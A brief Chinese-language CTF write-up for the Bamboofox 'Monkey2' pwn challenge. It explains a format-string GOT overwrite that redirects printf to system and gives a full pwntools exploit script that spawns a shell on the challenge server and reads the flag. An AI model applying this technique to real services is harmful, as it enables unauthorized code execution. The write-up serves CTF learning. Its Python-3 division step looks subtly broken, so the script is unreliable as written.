# Bamboofox/train/Monkey2 [100] ###### tags: `CTF`,`PWN`,`Bamboofox` 題目檔案連結:http://gofile.me/6lhQ2/oyjNcN1Tw 因為got表中存有system及printf的位址 只要將system的位址leak出來寫到printf的位址即可利用 printf("/bin/sh") get shell。 system在0x804a028 printf在0x804a00c ``` # -*- coding: utf-8 -*- from pwn import * context.arch = 'i386' local = False debug = False gdb1 = False if debug == True: context.log_level = "debug" if local: cn = process('./monkey') bin = ELF('./monkey') if gdb1==True: gdb.attach(cn) else: cn = remote('bamboofox.cs.nctu.edu.tw' ,11000) def program(Text): cn.recvuntil("choice!\n") cn.sendline("2") cn.recvuntil("out.\n") cn.sendline(Text) program(b"\x61\x61\x61\x61%9$s"+p32(0x804a028)) words = cn.recvuntil("\n") system_got_plt = int.from_bytes(words[4:8],byteorder="little") program(p32(0x804a00c)+p32(0x804a00e)+b"%"+str((system_got_plt%65536)-8).encode("utf-8")+b"c%7$n%"+str((system_got_plt/65536)-(system_got_plt%65536)).encode("utf-8")+b"c%8$n") program("/bin/sh") cn.sendline("cat /home/ctf/flag") cn.interactive() ```